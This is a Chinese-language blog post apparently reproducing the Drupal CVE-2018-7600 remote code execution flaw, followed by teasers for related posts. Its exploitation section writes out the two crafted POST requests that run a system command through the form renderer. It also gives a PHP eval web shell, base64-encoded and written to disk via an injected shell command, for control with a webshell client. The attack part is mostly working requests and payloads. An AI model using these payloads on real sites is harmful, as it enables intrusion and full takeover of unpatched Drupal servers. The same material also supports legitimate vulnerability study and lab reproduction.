Drupal-CVE-2018-7600漏洞(远程代码执行)

已于 2024-12-25 14:06:33 修改
阅读量628 收藏 4
点赞数 11
分类专栏: 漏洞 文章标签: 网络安全
于 2024-12-25 14:03:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/tiay__/article/details/144710822
版权

一、漏洞原理

该漏洞产生的原因在于Drupal对表单渲染时未进行严格的安全过滤,导致攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码。

二、确定版本

因为在Drupal 6.x,7.x,8.x系列的版本中,均存在远程代码执行漏洞。首先需要确定drupal版本。

  • 方法一:
    通过wappalyzer插件确定识别网站所使用的drupal版本
    在这里插入图片描述

  • 方法二:
    通过 /CHANGELOG.txt/UPGRADE.txt等文件查看版本号

三、漏洞验证(drupal 7.x)

抓取数据包后需要发送两次http请求
第一次请求:
构造如下请求报文

POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=id HTTP/1.1
......


form_id=user_pass&_triggering_element_name=name

找到form_build_id
在这里插入图片描述
第二次请求:

将value值放入第二次请求头中

POST /?q=file/ajax/name/%23value/form-4tbd3kG9Hz9fh-lnlPDxUZxYAIfgCJRny4q0jNykqkM HTTP/1.1
......


form_build_id=form-4tbd3kG9Hz9fh-lnlPDxUZxYAIfgCJRny4q0jNykqkM

发送后看到如下,可证明漏洞存在。
在这里插入图片描述

四、漏洞利用

  • 上传poc:
    <?php @eval($_REQUEST[777]); ?>

  • 进行base64编码
    PD9waHAgQGV2YWwoJF9SRVFVRVNUWzc3N10pOyA/Pg==

  • 输出
    echo%20%22PD9waHAgQGV2YWwoJF9SRVFVRVNUWzc3N10pOyA/Pg==%22|base64%20-d|tee%20tia.php
    使用该条命令代替第一次请求的id

  • 使用菜刀可以直接进行连接

漏洞复现】Drupal 远程代码执行漏洞(CVE-2018-7600)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-12 1048
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站。...
[ vulhub漏洞复现篇 ] Drupal Drupalgeddon 2 远程代码执行漏洞CVE-2018-7600
qq_51577576的博客
02-18 824
[ vulhub漏洞复现篇 ] Drupal Drupalgeddon 2 远程代码执行漏洞CVE-2018-7600Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用Drupal网站漏洞,执行恶意代码,导致网站被完全控制。
Drupal远程代码执行漏洞CVE-2018-7600
ANOrange的博客
04-10 1267
DrupalDrupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞远程攻击者可利用该漏洞执行任意代码。通过对比官方的补丁,可以得知是请求中存在 # 开头的参数。Drupal Render API 对于 # 有特殊处理。
DRUPAL 8.x远程代码执行漏洞(CVE-2018-7600)
errorr0
07-28 2810
drupal命令执行
CVE-2018-7600 Drupal核心远程代码执行漏洞分析
weixin_34246551的博客
12-27 377
0x01 漏洞介绍 Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。两周前,Drupal安全团队披露了一个非常关键的漏洞,编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。...
Drupal远程代码执行漏洞CVE-2019-6339)
weixin_46411728的博客
08-25 2872
Drupal 远程代码执行漏洞CVE-2019-6339)
CVE-2018-7600Drupal 8 远程代码执行漏洞
Mr_atopos的博客
06-07 3234
使用vulhub搭建环境使用vulhub搭建环境出现了一些问题,这里直接使用BUU的环境 BUU CEV-2018-7600进去也要初始化环境,一开始语言选择英文,数据库选择SQLite 其他的可以随便设置 进入 这个漏洞可能出现在填写表单的地方,该漏洞是Form API在用户提交表单数据时可以在表单渲染过程中修改表单数据想利用该漏洞,就需要在表单结构中的某个地方注入渲染数组,所以,首先要找到注入位置可以利用注册用户来进行漏洞利用先随便输入测试 通过查阅 Drupal 的代码和文档,可以知道,对于
CVE-2018-7600
05-14
CVE-2018-7600-master CVE-2018-7600-master CVE-2018-7600-master在我的文章有复现欢迎交流
Drupal 修复远程代码执行漏洞
smellycat000的专栏
11-20 287
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队周三,Drupal 内容管理系统 (CMS) 发布更新,修复了和不正确清理所上传文件名称有关的一个远程代码执行漏洞 (CVE...
CVE-2018-7600 Drupal 远程代码执行漏洞
星落的博客
04-07 884
漏洞介绍 Drupal 是一款用量庞大的CMS,在Form API中存在一处远程代码执行漏洞。 影响版本 Drupal 6.x Drupal 7.x Drupal 8.x 环境搭建 1.切换到drupal相关目录下,部署docker环境 cd/root/vulhub/weblogic/CVE-2018-7600 docker-compose build docker-compose up -d 2.查看docker服务器情况 dock ps -a 3.环境启动后,访问`htt..
drupal远程代码执行 (CVE-2018-7600)漏洞学习与复现
seek_2022的博客
12-17 5805
CVE-2018-7600漏洞学习与复现
Drupal 远程代码执行漏洞CVE-2018-7602)
EC_Carrot的博客
05-27 471
漏洞背景 DrupalDrupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。 Drupal 8.5.3之前的8.5.x版本、8.4.8之前的8.4.x版本和7.59之前的7.x版本中存在远程代码执行漏洞远程攻击者可利用该漏洞执行任意代码。 漏洞复现 我这边使用的是vulhub的环境,需要使用工具drupa7-CVE-2018-7602.py 使用命令为: # "id"为要执行的命令 第一个drupal为用户名 第二个drupal为密码 python3 drupa7-CVE-2018-7
drupal 代码执行 (CVE-2018-7600)复现
YouthBelief的博客
11-04 3974
@[TOC](drupal 代码执行 (CVE-2018-7600)) drupal 代码执行 (CVE-2018-7600) Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成 0x01 漏洞描述 http://blog.nsfocus.net/cve-2018-7600-analysis/ 该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻
vulfocus——drupal1代码执行(CVE-2018-7600)
m0_62063669的博客
09-07 1059
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站。函数会把第一个参数作为回调函数,之后的参数作为回调函数的参数。有特殊的处理,攻击者可利用Drupal表单渲染的问题执行恶意代码,达到完全控制。时就会提示可能导致代码执行Drupal的问题稍显常规,来自。是用户可控的,这就导致了。
Drupal远程代码执行漏洞(CVE-2018-7600)
总有人间一两风,填我十万八千梦
03-31 5665
一. 漏洞原理 Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。Drupal安全团队披露了一个非常关键的漏洞,编号CVE-2018-7600Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。 二. 影响版本 Drupal 6.x Drupal 7.x Drupal 8.x 三. 漏洞环境搭建 ...
Drupal 网站漏洞修复以及网站安全防护加固方法
网站安全专家
10-01 507
drupal是目前网站系统使用较多一个开源PHP管理系统,架构使用的是php环境+mysql数据库的环境配置,drupal的代码开发较为严谨,安全性较高,但是再安全的网站系统,也会出现网站漏洞drupal是网站运行访问必不可少的一个分支,为了网站的安全,不被攻击者攻击,我们要对网站以及服务器进行全面的安全加固与安全设置,包括我们服务器安全设置,web安全设置,php环境安全设置,msyql数据库...
[Drupal]CVE-2018-7600 BUUCTF
krysyal的博客
03-29 4628
[Drupal]CVE-2018-7600 BUUCTF 前期准备 进入之后环境安装 语言选english,因为没有mysql环境,所以安装的时候可以选择sqlite数据库,其他默认下一步 利用 直接使用网上公开的exp https://github.com/a2u/CVE-2018-7600 将exp里的命令换成env即可 反弹会话 可参考我上一篇文章,ssl反弹shell ...
内容管理系统Drupal提出重大安全漏洞
weixin_34311757的博客
02-23 432
2019独角兽企业重金招聘Python工程师标准>>> ...
drupal-cve2019-6340
最新发布
05-25
Drupal-cve2019-6340是Drupal内容管理系统(CMS)的一个安全漏洞。它被标记为“严重”的漏洞,可以允许攻击者执行任意代码,从而完全控制受影响的Drupal网站。 该漏洞存在于Drupal 8.6.x版本和8.5.x版本中,如果未正确配置,攻击者可以通过发送特定的请求利用该漏洞。攻击者可以通过该漏洞远程执行代码,并访问受影响网站上的敏感信息。 Drupal团队已经发布了针对该漏洞的补丁程序,建议Drupal用户尽快升级到最新版本以避免受到攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值